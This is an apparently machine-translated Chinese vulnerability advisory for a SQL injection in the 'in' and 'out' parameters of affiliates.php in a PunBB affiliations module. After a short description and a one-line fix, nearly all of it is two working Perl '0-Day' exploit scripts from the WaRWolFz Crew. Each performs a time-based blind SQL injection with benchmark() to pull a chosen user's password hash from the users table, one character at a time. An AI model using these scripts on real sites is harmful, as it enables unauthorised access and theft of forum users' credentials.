软件: PunBB所属模块1.x的
描述:
有些漏洞已报告的模块PunBB ,可以利用此漏洞进行SQL注入攻击。
输入传递到“in”和“out”参数affiliates.php是没有正确地过滤,然后使用SQL查询。这可以被利用来操纵SQL查询通过注入任意SQL代码。
这个安全漏洞是在版本1.1.0 。其它版本也可能受到影响。
解决方案:
编辑的源代码,以确保输入是正确地过滤。
测试代码:
XML/HTML代码
- #!/usr/bin/perl
- #[0-Day] PunBB Affiliations.php IN Mod <= v1.1 Remote Blind SQL Injection
- Exploit
- #Coded By Dante90, WaRWolFz Crew
- #Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew
- use strict;
- use LWP::UserAgent;
- use HTTP::Request::Common;
- use Time::HiRes;
- use IO::Socket;
- my ($Hash,$Time,$Time_Start,$Time_End,$Response);
- my($Start,$End);
- my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
- my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site
- Link
- my $id = shift or &usage;
- my $Method = HTTP::Request->new(GET => $Host);
- my $HTTP = new LWP::UserAgent;
- my $Referrer = "http://warwolfz.altervista.org/";
- my $DefaultTime = request($Referrer);
- sub Blind_SQL_Jnjection{
- my ($dec,$hex) = @_;
- return "./affiliates.php?in=-1+OR+1!=(SELECT
- IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0)
- FROM `users` WHERE `id`=${id})/*";
- }
- for(my $I=1; $I<=40; $I++){ #N Hash characters
- for(my $J=0; $J<=15; $J++){ #0 –> F
- $Time_Start = time();
- $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
- $Time_End = time();
- $Time = request($Referrer);
- refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
- if($Time_End – $Time_Start > 6){
- $Time = request($Referrer);
- refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
- if($Time_End – $Time_Start > 6){
- syswrite(STDOUT,chr($chars[$J]));
- $Hash .= chr($chars[$J]);
- $Time = request($Referrer);
- refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
- last;
- }
- }
- }
- if($I == 1 && length $Hash < 0 && !$Hash){
- print " * Exploit Failed *\n";
- print " —————————————————— \n";
- exit;
- }
- if($I == 40){
- print " * Exploit Successed *\n";
- print " ——————————————————\n ";
- system("pause");
- }
- }
- sub usage{
- system("cls");
- {
- print " \n [0-Day] PunBB Affiliations.php IN Mod <= v1.1 Remote
- Blind SQL Injection Exploit\n";
- print " —————————————————— \n";
- print " * USAGE: *\n";
- print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
- print " * perl name_exploit.pl [id] *\n";
- print " —————————————————— \n";
- print " * Powered By Dante90, WaRWolFz Crew *\n";
- print " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n";
- print " —————————————————— \n";
- };
- exit;
- }
- sub request{
- $Referrer = $_[0];
- $Method->referrer($Referrer);
- $Start = Time::HiRes::time();
- $Response = $HTTP->request($Method);
- $Response->is_success() or die "$Host : ", $Response->message,"\n";
- $End = Time::HiRes::time();
- $Time = $End – $Start;
- return $Time;
- }
- sub refresh{
- system("cls");
- {
- print " \n [0-Day] PunBB Affiliations.php IN Mod <= v1.1 Remote
- Blind SQL Injection Exploit\n";
- print " —————————————————— \n";
- print " * USAGE: *\n";
- print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
- print " * perl name_exploit.pl [uid] *\n";
- print " —————————————————— \n";
- print " * Powered By Dante90, WaRWolFz Crew *\n";
- print " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n";
- print " —————————————————— \n";
- };
- print " * Victime Site: " . $_[0] . "\n";
- print " * Default Time: " . $_[1] . " seconds\n";
- print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n";
- print " * BruteForcing N Char Hash: " . $_[5] . "\n";
- print " * SQL Time: " . $_[4] . " seconds\n";
- print " * Hash: " . $_[3] . "\n";
- }
- #WaRWolFz Crew
XML/HTML代码
- #!/usr/bin/perl
- #[0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection
- Exploit
- #Coded By Dante90, WaRWolFz Crew
- #Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew
- use strict;
- use LWP::UserAgent;
- use HTTP::Request::Common;
- use Time::HiRes;
- use IO::Socket;
- my ($Hash,$Time,$Time_Start,$Time_End,$Response);
- my($Start,$End);
- my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
- my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site
- Link
- my $id = shift or &usage;
- my $Method = HTTP::Request->new(GET => $Host);
- my $HTTP = new LWP::UserAgent;
- my $Referrer = "http://warwolfz.altervista.org/";
- my $DefaultTime = request($Referrer);
- sub Blind_SQL_Jnjection{
- my ($dec,$hex) = @_;
- return "./affiliates.php?out=-1+OR+1!=(SELECT
- IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0)
- FROM `users` WHERE `id`=${id})/*";
- }
- for(my $I=1; $I<=40; $I++){ #N Hash characters
- for(my $J=0; $J<=15; $J++){ #0 –> F
- $Time_Start = time();
- $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
- $Time_End = time();
- $Time = request($Referrer);
- refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
- if($Time_End – $Time_Start > 6){
- $Time = request($Referrer);
- refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
- if($Time_End – $Time_Start > 6){
- syswrite(STDOUT,chr($chars[$J]));
- $Hash .= chr($chars[$J]);
- $Time = request($Referrer);
- refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
- last;
- }
- }
- }
- if($I == 1 && length $Hash < 0 && !$Hash){
- print " * Exploit Failed *\n";
- print " —————————————————— \n";
- exit;
- }
- if($I == 40){
- print " * Exploit Successed *\n";
- print " ——————————————————\n ";
- system("pause");
- }
- }
- sub usage{
- system("cls");
- {
- print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote
- Blind SQL Injection Exploit\n";
- print " —————————————————— \n";
- print " * USAGE: *\n";
- print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
- print " * perl name_exploit.pl [id] *\n";
- print " —————————————————— \n";
- print " * Powered By Dante90, WaRWolFz Crew *\n";
- print " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n";
- print " —————————————————— \n";
- };
- exit;
- }
- sub request{
- $Referrer = $_[0];
- $Method->referrer($Referrer);
- $Start = Time::HiRes::time();
- $Response = $HTTP->request($Method);
- $Response->is_success() or die "$Host : ", $Response->message,"\n";
- $End = Time::HiRes::time();
- $Time = $End – $Start;
- return $Time;
- }
- sub refresh{
- system("cls");
- {
- print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote
- Blind SQL Injection Exploit\n";
- print " —————————————————— \n";
- print " * USAGE: *\n";
- print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
- print " * perl name_exploit.pl [uid] *\n";
- print " —————————————————— \n";
- print " * Powered By Dante90, WaRWolFz Crew *\n";
- print " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n";
- print " —————————————————— \n";
- };
- print " * Victime Site: " . $_[0] . "\n";
- print " * Default Time: " . $_[1] . " seconds\n";
- print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n";
- print " * BruteForcing N Char Hash: " . $_[5] . "\n";
- print " * SQL Time: " . $_[4] . " seconds\n";
- print " * Hash: " . $_[3] . "\n";
- }
- #WaRWolFz Crew
0 条评论。